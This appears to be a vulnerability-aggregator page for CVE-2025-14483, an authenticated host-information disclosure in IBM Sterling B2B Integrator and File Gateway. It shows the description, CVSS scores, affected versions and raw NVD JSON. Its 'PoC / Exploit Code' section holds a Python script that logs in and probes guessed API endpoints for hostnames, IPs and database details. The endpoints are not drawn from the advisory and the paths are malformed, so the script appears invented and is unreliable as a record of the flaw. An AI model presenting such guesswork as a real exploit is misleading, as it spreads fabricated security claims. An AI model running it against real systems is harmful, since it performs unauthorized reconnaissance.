Security Vulnerability Report
中文
CVE-2025-14483 CVSS 4.3 MEDIUM

CVE-2025-14483

Published: 2026-03-13 19:53:50
Last Modified: 2026-03-20 19:19:15

Description

IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.1.0.0 through 6.1.2.7_2, 6.2.0.0 through 6.2.0.5_1, 6.2.1.0 through 6.2.1.1_1, and 6.2.2.0 could disclose sensitive host information to authenticated users in responses that could be used in further attacks against the system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:* - VULNERABLE
IBM Sterling B2B Integrator 6.1.0.0 - 6.1.2.7_2
IBM Sterling File Gateway 6.1.0.0 - 6.1.2.7_2
IBM Sterling B2B Integrator 6.2.0.0 - 6.2.0.5_1
IBM Sterling File Gateway 6.2.0.0 - 6.2.0.5_1
IBM Sterling B2B Integrator 6.2.1.0 - 6.2.1.1_1
IBM Sterling File Gateway 6.2.1.0 - 6.2.1.1_1
IBM Sterling B2B Integrator 6.2.2.0
IBM Sterling File Gateway 6.2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14483 PoC - IBM Sterling Information Disclosure # This PoC demonstrates how an authenticated user can trigger information disclosure import requests import json TARGET_URL = "https://target-ibm-sterling.example.com" USERNAME = "attacker" PASSWORD = "password123" def login(): """Authenticate to the IBM Sterling application""" session = requests.Session() login_url = f"{TARGET_URL}/ SterlingAPI/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data, verify=False) if response.status_code == 200: return session return None def exploit_information_disclosure(session): """Exploit CVE-2025-14483 to disclose sensitive host information""" # Target endpoints that may leak host information endpoints = [ "/ SterlingAPI/system/config", "/ SterlingAPI/system/info", "/ SterlingAPI/network/routes", "/ SterlingAPI/server/status" ] leaked_info = [] for endpoint in endpoints: try: response = session.get(f"{TARGET_URL}{endpoint}", timeout=10) if response.status_code == 200: data = response.json() # Check for sensitive information in response if any(key in str(data).lower() for key in ['hostname', 'ip', 'internal', 'server', 'path', 'database']): leaked_info.append({ "endpoint": endpoint, "data": data }) print(f"[+] Sensitive info leaked from: {endpoint}") print(f" Data: {json.dumps(data, indent=2)}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return leaked_info if __name__ == "__main__": print("[*] CVE-2025-14483 - IBM Sterling Information Disclosure") print("[*] Authenticating to target...") session = login() if session: print("[+] Authentication successful") print("[*] Exploiting information disclosure...") results = exploit_information_disclosure(session) if results: print(f"\n[!] Leaked {len(results)} sensitive information items") else: print("[-] No sensitive information found") else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14483", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:49.933", "lastModified": "2026-03-20T19:19:14.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.1.0.0 through 6.1.2.7_2, 6.2.0.0 through 6.2.0.5_1, 6.2.1.0 through 6.2.1.1_1, and 6.2.2.0 could disclose sensitive host information to authenticated users in responses that could be used in further attacks against the system."}, {"lang": "es", "value": "IBM Sterling B2B Integrator y IBM Sterling File Gateway 6.1.0.0 hasta 6.1.2.7_2, 6.2.0.0 hasta 6.2.0.5_1, 6.2.1.0 hasta 6.2.1.1_1, y 6.2.2.0 podrían divulgar información sensible del host a usuarios autenticados en respuestas que podrían ser utilizadas en ataques posteriores contra el sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.0", "versionEndExcluding": "6.1.2.8", "matchCriteriaId": "CF5BFBAA-B7B6-43FC-893D-F62E8AC28673"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_2", "matchCriteriaId": "0F026F01-EF66-4E43-A081-F1B2C7C87904"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.1.0", "versionEndExcluding": "6.2.1.1_2", "matchCriteriaId": "0D31014C-F7D8-4B69-AB89-2A6AEAB7B667"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E8CC6F03-A96D-4D0F-A846-890006E405A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.0", "versionEndExcluding": "6.1.2.8", "matchCriteriaId": "00C60634-AE0C-4641-B645-0D0511A0070C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_2", "matchCriteriaId": "98CB35E7-789A-44B3-86E3-6F2A0CE56D4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.1.0", "versionEndExcluding": "6.2.1.1_2", "matchCriteriaId": "4AD23AED-25F6-45AB-93DD-FC1864431290"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:6.2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2813946-2022-4789-9285-25E576E49609"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7263329", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}